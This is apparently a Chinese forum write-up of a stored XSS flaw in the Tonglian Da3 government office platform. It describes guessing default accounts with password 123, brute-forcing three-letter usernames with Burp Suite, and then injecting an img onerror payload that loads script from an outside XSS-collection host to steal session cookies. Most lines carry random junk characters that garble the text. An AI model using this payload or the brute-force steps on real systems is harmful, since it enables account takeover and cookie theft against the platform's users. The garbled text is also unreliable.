" ?# f2 M4 K$ C* ], y & s* \/ V% r* A2 y- T1 a1 e! t
同联Da3协同办公平台后台通用储存型xss漏洞- T8 B' o1 t4 B# j: M1 w) D
5 ^" q" z! P' c I/ R2 p- F' R4 j
& \" u) b$ K4 e$ A$ h. T0 ?8 g 平台简介:
9 X& m! \, R' z# i5 S: o1 v6 h0 ?
5 ?7 D; H: g3 Y5 T+ i7 c
8 K! T; F" ^) s4 {
3 ?! V0 h, Y0 p$ p
* s, r5 {* u, h0 P0 Y7 U4 V# T6 y" K
8 r# i$ R( r( Q5 ?2 w7 a9 V 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
& R+ c2 A3 t; X3 D3 }' i( T7 Y
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
' f/ g' X: D3 Q9 k# O) A" T
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
' K* `6 [4 {- {( H! `2 ]. r$ `7 ]
8 p, D3 Q6 J7 K% g. Y
) x; V* E( [+ n5 L
# a7 k6 |+ b- d( N2 I: p
! ~/ Y8 N; G! O, ?, e: a& I/ t
! C5 U6 J' [3 B2 O- d 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:0 R+ s0 _3 m4 f) P- T/ n
; @* U& Y8 N/ O. J* h : `# i& |, F* l7 C( K
( \3 g, W- t' a4 {7 {
0 N' b o( W# t1 O$ B; x" Q; Y1 P
2 k9 h8 M% F4 M8 M* T http://1.1.1.1:7197/cap-aco/#(案例2-)
# Q6 G* X% ?9 A, Q8 X& ~
# O4 R4 J: o. k, h9 H 1 g7 x% n3 X5 S% c
http://www.XXOO.com (案例1-官网网站)5 A$ w Y4 U" _
% y S5 o8 i4 b- ~. \1 Y) {* y8 C
, N, C1 U7 m: {6 q7 p n0 B 漏洞详情:
+ C- F6 G( y1 a
; q y, ^. y( t* |
- n: T4 }3 e' N# l' w2 S1 [
案例一、
/ X2 ]; G( l6 b2 x1 D8 Z: }. Z
" V8 h0 o' T* C" t4 l1 L
. q0 T; A1 B9 H$ w 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试7 Q( P% `/ S/ _
+ R( R& }/ L& x: w3 \
! }* e Z% c+ t2 N4 r. _/ d6 e
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:( J! x6 k. m% W# V) T2 k
: z1 }' t! G; ]1 {
5 @9 a+ \, e( k( \% z2 Z ( n- r2 I( i, N% [ ^4 y8 R, v9 M2 \
a; F0 b) m- e3 l+ x
9 H3 s; _7 L6 @, y
4 o$ F( i9 N; e6 |, x
7 }/ L9 R8 [$ Q# L: {4 z
% \# M% j; ]) P X, ]
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
2 B2 Z2 J. u# e. b8 j# e. U$ q: W
: F5 R% t- T. s4 G: \" m/ v
' P1 {' E; ~/ D3 I1 p
) c% ]& h! d$ |6 K& g" B* q9 C
* I; A' e6 j5 j9 z/ F) V: L6 K
5 O/ B5 v9 }* X+ H2 B9 C+ r
: f& ?3 l1 m% O/ S
& o% |8 J& L' Y6 Y
$ P. z' t# ^$ i) m( t 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
/ Z6 L& Y0 f# O2 x4 X
2 f% w: a& p6 k3 U& R+ Q
# |3 |0 W# p4 v! i1 F
. S2 p) \% p; x: \+ y+ f
( N }" b& @' d9 {5 K: V
/ l# K+ a& j R0 P$ }- ]
<img src=x! }8 {% k2 ^* i* i, V5 ]
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
: x: h5 d8 {9 V/ J9 \% a+ E' w
1 U- B" y* m" U' W- N
; e8 r% @- Z4 |4 y1 d; @- r
2 w' Y6 G+ L/ v; ?9 n0 }& f
* G+ C: H# g$ N" o( G 1 d8 G% _6 V3 |
然后发送,接收cookie如图: 6 X' u' j% I5 u. x! Y; D
- s O; H# i$ b7 [# {; M
+ M$ S* n. }9 D, F+ c. q- L
! r c' m/ y4 J* Y6 D! T
, r- a) d! v% o5 m" q. v1 t
1 _; K6 [! `8 S3 G
1 D4 [; j: i5 f: V1 ]
/ L a; G8 h7 s' f
1 O" v' b6 m' a2 [ ( r+ C5 X7 z+ B/ y! h9 p, }" B# n6 G
' v4 d, T- x& B5 _1 V3 g& b
$ @5 e, x+ s- ~$ {; S. V- a$ Y0 ~ # X. p: X. P( T/ ^6 f$ Y
3 d/ x+ z7 S: x! I6 {
' B) L \$ |$ L- O3 H8 L
1 h4 D8 y0 G' H, q1 f
# ~* |8 X8 o* u9 N5 l8 e t" t+ a; V 2 d/ E: X, c, H* e- p
* ?' Z& {: H- ~' n# I
& x6 ?( u' U! _9 Q4 b
& w4 z S( B8 [9 ?3 v0 x. z
* `9 [" h1 k0 q
: @( @1 o N. f/ v. g 9 u5 i8 I5 b# {! r6 a: Y5 f
案例2、 : D9 q0 g. }6 n' r/ g
: A6 b5 o5 h4 c
. J- ^5 x" @: b" U! i 前面步骤都一样,下面看效果图:
4 Y- a' `* O! m& V; W$ A
' L& _' \! H/ \, v; G
: [% c% P* W/ A3 @: T
9 v) H1 T# J" _& \# `; x
: u; w d6 _' \2 ~
( R, f/ J: N& k1 a$ M0 h3 }
& o; n3 a: D% v! h( X5 |4 w# U
3 d; N. `6 Y0 I" f# u
6 i2 G8 A9 ?1 H. h3 k
7 ?. J8 O, I- y1 h4 p
( w, [/ n w4 t, k5 ]9 P 6 k0 w3 d* a2 m% l) r
- I* g3 h" K6 P7 D5 x2 D& m1 `
: k6 W& N9 p2 \* Q" @
+ m) _& {2 b/ x. |, l* @- c
+ {5 d& I' i- w' g# ~: F) {- j
% T/ i; W/ R) Z& @$ t0 L
2 C6 m+ P( }( [ 7 H7 k4 L- x! N; @$ K, ?
$ }4 _0 A# w K+ D8 e U; M4 m
3 I; a' D4 y8 T) X
" X) ?2 i( P4 I* e8 @$ M
0 w+ Z% O/ ~$ [& z6 q
3 o3 h5 _& u# ^
% ~1 u" N& M& u; H$ K1 L2 r
, w$ W: a2 j4 |8 C( M% i" N
5 v3 \2 X* E& W3 O% H' Y
3 p/ r, X" }/ _ h, N" _$ Q6 ^1 [
! |* z3 V$ [& S! F